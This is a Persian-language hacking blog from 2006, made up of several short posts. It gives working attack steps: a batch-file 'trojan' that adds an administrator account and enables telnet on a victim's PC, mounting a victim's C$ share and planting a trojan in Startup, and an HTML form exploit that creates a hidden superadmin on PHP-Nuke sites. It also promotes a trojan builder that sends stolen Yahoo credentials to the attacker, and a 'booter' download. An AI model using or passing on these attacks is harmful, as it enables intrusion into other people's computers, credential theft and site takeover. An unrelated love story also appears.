آموزش هک و ترفند

شروع کار با telnet

telnet چيست ::اينهمه از telnet استفاده کرديد و ميدونيد که چه کاربردی داره مثلاً ميخواهيد به پرت بازه يه کامپيوتر وصل شی ميزنی :
telnet yourtarget Port
Telnet www.yahoo.com 80
ولی اگه بدونيد telnet استفاده کاربردی تری هم داره ممکنه که تعجب کنيد. بله telnet در اصل اسمه يک service است که اجازه دسترسی به خط فرمان رو از طريقه ریموت يا از راهه دور ميده . از همين حالا فکر ميکنم بتونيد بفهميد چه استفاده های جالبی ميشه از اون کرد
2) طريقه فعالسازی تو ويندوز :

به قسمت Start --> Run --> Run تایپ کنید Cmd خط فرمان واستون مياد حالا تایپ کنيد :

Net Start telnet
ميبينيد که مينويسه :
The Telnet is starting
خوب حالا پرته 23 يا سرویس تلنت رو کامپيوتر خودمون اجرست. خوب همان طور که خودتون ميدونيد با استفاده از دستور زير ميشه باهاش ارتباط برقرار کرد :
Telnet 127.0.0.1
يا :
Telnet 127.0.0.1 23
خوب الان که وقتی وصل شد از شما يه سؤال ميشه شما مثبت جواب بديد سؤال ميگه که شما بصورت secure یوزر و پسورد رو Send نميکنيد آيا ادامه بدم ؟ خوب حالا با يهیوزر و پسورد ميتونيد به Command دسترسی پيدا کنيد البته ازطريقه telnet . برايه ساختن یوزر و پسورد جديد تایپ کنيد :

net user USER PASS /add
Net localgroup Administrators USER /add

خوب حالا يه یوزر و پسورد جديد داريد. توجه کنيد که تمام دستورت رو بايد تو ويندوز هايه nt ، 2000 ، XP اجرا شن . 3) خوب به مختون فشار اوردين ببينين که چه جوری ميتونيد حالا يه trojan داشته باشيد ؟؟؟؟؟ خوب خودم ميگم : يه TXT باز کنيد توش خط به خط اينا رو بنويسيد :

net start telnet net user 1 1 /add
net localgroup administrators 1 /add

حالا اونو با اين اسم Save کنيد : 1.bat خوب حالا اگه اونو اجرا کنيد يه صفحه زود ميادو ميره. خوب ببينيم چه ميشه : اوّل يه یوزر و پسورد در گروه Administrator ايجاد ميشه. بدش service telnet راه اندازی ميشه اينو واسه يکی بفريستيد با در دست داشتنه IP همين طور که گفته شده ميتونيد با فرمان : Telnet 23 به اون کامپيوتر وصل بشی و یوزر و پسورد رو وارد کنی و Command طرف رو بگيری حالا هر کاری دوست داری ميتونی بکنی ميتونه فايل پاک کنی درایو ها رو فرمت کنيد و .... ولی باید توجه داشت که مسئله مهم آموزش هستش نه کرم ريزی در ضمن کسی با اين کارا بهش يه ""هکر"" نميگن بلکه بهشا ميگن ""script kiddie"" يا همون جوجه هکر خودمون ... خوب بگزريم . برايه توقفه telnet بايد تو Cmd بزنی :

Net Stop telnet

موفق باشین bye

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:15 توسط مهرداد |

يه بوتر بسيار قوي

اينم يه بوتر قوي واسه شما

این بوتر که اینجا واسه دانلود گذاشتم یکی از بوتر های فوق حرفه ای

بهشمار میاد اینو دانلود کنید

تا شما اولین نفری باشین که مجهز به قوی ترین بوتر هستید

دانلود

نظر هم بده ممنون!!!!!

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:14 توسط مهرداد |

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید

اول باید IP سیستم مورد نظر رو پیدا کنید، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: file://IP/DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: file://80.191.191.39/c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )

حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....

موفق باشید

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:13 توسط مهرداد |

نفوز به یک شبکه

سلام

امروز می خوام به شما یاد بدم که به سادیگی به تمامی کامپیوترهای یک شبکه وصل شویم

مثلا ما در یک کافینت که تمامی سیستم های آن باهم شبکه هستن وصل شویم

ما می خواهیم که از طریق یک سیستم به تمامی سیستم های آن شبکه متصل شویم

برای این کار ما باید از نرم افزار خود ویندوز استفاده کنیم

برای شروع کار ازمنوی Start برنامهMy Network Places را انتخاب کنید و در My Network Places

تعدادی پوشه وجود دارد که هر کدام مربوت به سیستم ها که در آن شبکه وجود دارد می باشد

وشما درایو سیستم آمل هر یک ازاین سیستم ها در اختیار دارید

موفق باشید

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:12 توسط مهرداد |

اكسپلويت چيست ؟

پاورقي:همونطوری که می دونیم به هر کاراکتر یک عدد که شامل 0و1 است اختصاص داده میشه کدهای اکسپلویت از این قانون اطاعت می کنند. برای تبدیل اینا به زبون صفرویک که تو رایانه شما استفاده میشه از مترجم استفاده میشه که همون IIS است (درواقع این کلمه همون internet information services خودمونه !)
ببينيد براي متوجه شدن اين مفهوم بايد با آسيب پذيري ها يا Vulnerability ها آشنايي داشته باشيد . فكر كنيد كه شما مي خواهيد به فولدر يك وب سايت كه سرور آي-آي-اس بر آن نصب شده است با استفاده از باگ Unicode دسترسي پيدا نماييد و نياز به ارسال تعدادي درخواست به سرور هستيد( البته اين كار جهت هكر هاي خبره مانند استفاده از ماشين حساب در انجام عمليت رياضي است‌) .

چگونه مي توان از آن استفاده كرد ؟
كدهاي اكسپلويت رو كامپايل كنيد(نمونه كدهاي اكسپلويت در سايت موجود است) بعد از كامپايل كردن يه خط فرمان به شما ميده يا يه پوشه به نام read me كه دستوراتي كه ميشه از اون اكسپلويت استفاده كرد رو توش نوشته ..براي اجراي اكسپلويت هم شما بايد مسير اونو درcommand سيستم مشخص كنيد و با استفاده از دستورات خود اكسپلويت و آي پي هدف به اون سايت وصل بشين البته اين رو هم بگم شما اول بايد سايتي كه ميشه از طريق اون اكسپلويت ازش Share اشتراك گرفت رو پيدا كنيد ...
كامپايل اكسپلويت
شما از طريق دو سيستم عامل لينوکس و ويندوز می توانيد اکسپلويت های خود را کامپايل کنيد . توصيه من لينوکسه چون اکثر اکسپلويت ها در اون کامپايل ميشن ولی در ويندوز چون بعضی از هدر ها رو شامل نمی شه نميشه همه اکسپلويت ها رو کامپايل کرد .

كامپايل اكسپلويت تحت ويندوز:
برای کامپایل کردن اکسپلویت های C در ویندوز می تونید از ++Visual C و Lccwin و ++Borland C استفاده کنید (برنامه پيشنهادي من)
بعد از كامپايل اكسپلويت بايد اونو اجرا کنيد . و شما نمی تونيد اونو با کليک کردن اجرا کنيد چون باز نميشه برای اينکار بايد اکسپلويت کامپايل شده را در دايرکتوری ويندوزتون در يك پوشه اي کپی کنيد . و بعد به منوی استار رفته و روی گزينه Run کليک کنيد و سپس تايپ کنيد :

کد:

cmd

حالا command prompt باز شده حالا بايد اسم اکسپيويتتون رو تايپ کنيد بطور مثال :

کد:

lsas.exe

اکسپلويت هم نحوه کار رو داخل همون داس ويندوز توضيح می ده که اگه يه کم زبان بلد باشين می فهميد . مثلا همين اکسپلويت بالا. با نوشتن ای پی و يک پورت انتخابی مثل ۶۶۶۹ يا ۵۲۷۷ .نوع سيستم عامل طرف رو به شما می ده و اگر سيستم طرف ويندوز سری ان تی قديمی ( مثلا ماله پارسال ) باشه به پورتی که شما دادين حمله می کنه و کاری می کنه که شما می تونيد با يه تلنت به اون پورت به شل ( Shell) سيستم قربانيتون برسيد .

كامپايل اكسپوليت تحت لينوكس:

برای کامپایل کردن اکسپلویت های C در لینوکس می تونید از کامپایلر GCC استفاده کنید
براي كامپايل اكسپلويت در لينوكس به قسمت Shelle ميريم و با دستور زير

کد:

Gcc – O Exploit Name

اكسپلويت كامپايل ميشه و براي اجراي اون هم از دستور زير استفاده ميكنيم

کد:

/.

نکته:اکسپلویت هایی که تحت لینوکس هستند دارای انکلود*هستند و از طریق همین انکلود هست که ما متوجه میشیم که این اکسپلویتها برای سیستم عامل لینوکس نوشته شده است
انکلود*:مجموعه ای است از تعاریف دستوراتی که برنامه نویس در برنامه اش از آن استفاده می کند
برای اجرا کردن اکسپلویت های پرل در محیط های ویندوز و لینوکس هم تنها به برنامه Active Perl احتیاج دارین

نظر یادت نره

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:12 توسط مهرداد |

هک کارت اینترنت آموزش

اینم از آموزش هک کارت اینترنت

در این روش باید ISP شما دارای سایت باشه که از اونجا بتونید میزان مصرف اینترنت خودتون رو چک کنید. خب حالا باید CMD رو اجرا کنید.(برای این کار از منوی استارت به Run رفته و تایپ کنید cmd و دکمه ok رو بزنید.) حالا باید چند تا دستور رو بنویسید که من به ترتیب اونا رو بهتون میگم:

1.تایپ کنید ftp و بعد enter رابزنید تا به خط بعد برود.

2.در اینجا بنویسید Open و enter را بزنید.

3.در این خط شما باید سایت ISP تون رو وارد کنید و enter بزنید.بعد از اینکه سایت چک شد و از ISP بودن اون مطمئن شد باید یه یوزر شانسی برای چک شدن بنویسید.بعد از اون باید منتظر بشینید تا پسورد یوزر در صورت وجود داشتن و کانکت بودن به شما داده بشه.

موفق باشین

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:11 توسط مهرداد |

آموزش هک سایت

سلام دوستان

امروز میخام واستون آموزش هک سایت بزارم.

هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به

منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>

خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشیدنظر یادت نره!!!!!

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:11 توسط مهرداد |

فقط براي آنهايي که عاشق هستند

حتما بخونين

فقط براي آنهايي که عاشق هستند

از بين تمام آي دي هاي که از اينور و اونورپيدا کرده بود اين آيدي رو جور ديگه دوست داشت.با اينکه حتي هنوز نميدونست اين ايدي مال کيه اما از روي جمله هايي که مينوشت و بدون هيچ دليل ديگه اي عاشقش شده بود.

همديکه رو دوست داشتن و هر روز سر ساعت مشخصي با هم چت ميکردن.تو اين مدت از خيلي چيزا واسه هم ميگفتن.حتي حالا بعد از مدتها از همديگه رازهايي ميدونستن که هيچ کي از اونا خبر نداشت.خيلي با هم صميمي شده بودن و هر روز سر همون ساعت هر طور شده ميومدن و با هم چت ميکردن.

ولي... امروز روز ديگه اي بود.اون ايدي و اون اسمي که دوسش داشت امروز نيومده بود. خيلي تعجب کرد چون اون هميشه چند دقيقه زودتر ميومدو منتظر ميموند.چند دقيقه به تلخي گذشت.خيلي منتظر موند اما اون نيومد.بعد از اون همه مدت اين يه اتفاق غيرمنتظره بود.از ساعت قرارشون ساعتها گذشت و يک روز غيرعادي تموم شد.اون روز هيچ خبري ازش نشد.

فردا دوباره سر همون ساعت آنلاين شد.مطمئن بود که ديگه امروز حتما مياد.به خودش گفت لابد ديروز حتما يه اتفاق غير منتظره افتاده بود که نتونسته بود بياد.خوب اتفاقه ديگه!تو هين فکراي آشفته بود که با ناباوري ديد بازم ايدي اون خاموشه.براي چند لحضه چشاشو روي هم گذاشت و در چند ثانيه هزار تا فکر تو ذهنش پر زد.

اونقدر ناراحت و عصباني شد که همون لحظه کامپيوترو خاموش کرد و لباسشو پوشيدو رفت بيرون که قدم بزنه.

از خيابون خودشون گذشت و چند تا کوچه پايين رفت.صداي ضعيفي از انتهاي کوچه احساس کرد.صدا رو دنبال کردو همينطور که جولو ميرفت تصويرهاي مبهمي جولوي چشماش شکل گرفت.صدا صداي قرآن بود.يه عالمه آدمهاي سياهپوش!اختلاط صداي محزون قرآن با صداي گريه ها مثه يه پتک وسط سرش فرود اومد.قدمهاي سست و بي رمقش رو يکي يکي جولو ميذاشت تا خودشو به اون عکس نزديکتر کنه.

حالا چند قدم بيشتر به عکس کسي که مرده بود فاصله نداشت.پايين عکس نوشته بود:يک روز است که بي تو بودن را تجربه ميکنيم ولي گويي سالهاست اشکها ميهمان چشمهاي نااميدان گشته اند.چشمهاي نگرانشو آرام آرام بالا برد تا ببينه که عکس مال کدوم بنده خداييه.وقتي چشاش با چشاي توي عکس گره خورد درست مثل دفعه اول قلبش مثل کبوتر تندتند شروع کرد به زدن. با اين تفاوت که وقتي اسمشو خوند و مطمئن شد که اين عکس همون کسيه که روزگاري عاشقش بوده همونجا بيهوش نقش برزمين شد.

اون روز دکترها گفتن به دليل سکته اي که داشته رفته به حالت کما.

از اون روز به بعد ديگه هيچ وقت اون دو تا ايدي روشن نشدن.اون دو تا ايدي براي هميشه خاموش شدن ولي مهم اين بود که هر دو با هم خاموش بودن.

خدا کنه حکايت ما اينجوري نشه.

منبع(هکران دلتا)

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:9 توسط مهرداد |

نرم افزار DaB3

سلام به همه

با این برنامه شما می توانید آیدی خود را

از مسنجر دیگران که بدون اجازه اد کرده اند پاک کنید .

دانلود

حالشو ببر!!!!نظر یادت نره!!!!!!

نرم افزار DaB3

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:8 توسط مهرداد |

رخنه ps

قابلیتهای اصلی : (Screen Shot )

امکان تعریف Server Title جهت تشخیص قربانی های مختلف از یکدیگر .

امکان تعیین نام سرور . پسوند فایل سرور و دایرکتوری که سرور در آن نصب خواهد شد.

امکان پاک کردن فایل اصلی بعد از نصب در کامپیوتر قربانی (Melt Server )

امکان اجرای سرور بلافاصله بعد از نصب و بدون نیاز به ریستارت یا خاموش کردن کامپیوتر (Auto Run)

امکان مشخص کردن کلید رجیستری برای Start up و همچنین تعیین اینکه سرور برای همه کاربران اجرا شود یا خیر .

امکان تعریف Fake Error که بعد از اجرای فایل توسط قربانی در زمان نصب سرور نمایش داده میشود .

قابلیتهای رجیستری و ویندوز :

امکان غیر فعال کردن Task Manager در ویندوز xp و 2000 .

امکان بستن دسترسی کاربر به برنامه Regedit

امکان جلوگیری از اجرای برنامه هایی که شما تعریف میکنید (مثلا winamp و winzip و Calculator و ... )

و برای اولین بار در دنیا امکان تعریف پسوند جدید برای فایلهای اجرایی در کامپیوتر قربانی (مثل Jif. و Str. و Amir. و هر پسوند دیگر)

قابلیتهای اطلاع رسانی :

شامل فرستادن اطلاعات زیر به یاهو Id شما میشود :

نام سرور

ID و Password یاهو مسنجر

تمام Profile های تعریف شده روی ID هک شده .

Profile های Active روی ID هک شده .

تمام ID هایی که از زمان نصب یاهو مسنجر (حتی قبل از هک شدن) به آن Login کرده اند.

نام کامپیوتر قربانی

نام کاربری ویندوز قربانی

آدرس IP قربانی

ساخت سرور :

امکان تغییر Icon فایل سرور .

امکان Bind کردن فایل دومی به سرور

تعیین دایرکتوری و نامی که فایل Bind شده در آن Drop خواهد شد .

تعیین اینکه آیا فایل Bind شده بعد drop شدن باید اجرا شود یا خیر

توجه : قبل از دانلود این برنامه و استفاده از آن باید توجه داشته باشید که هرگونه استفاده ناشایست از آن ممنوع است و شما با عنوان کاربر این برنامه تمامی مسئولیتهای اخلاقی و قانونی آن را بر عهده خواهید داشت .

DownLoad

+ نوشته شده در یکشنبه 16 بهمن1384ساعت 20:7 توسط مهرداد |

آموزش هک و ترفند

نوشته های پیشین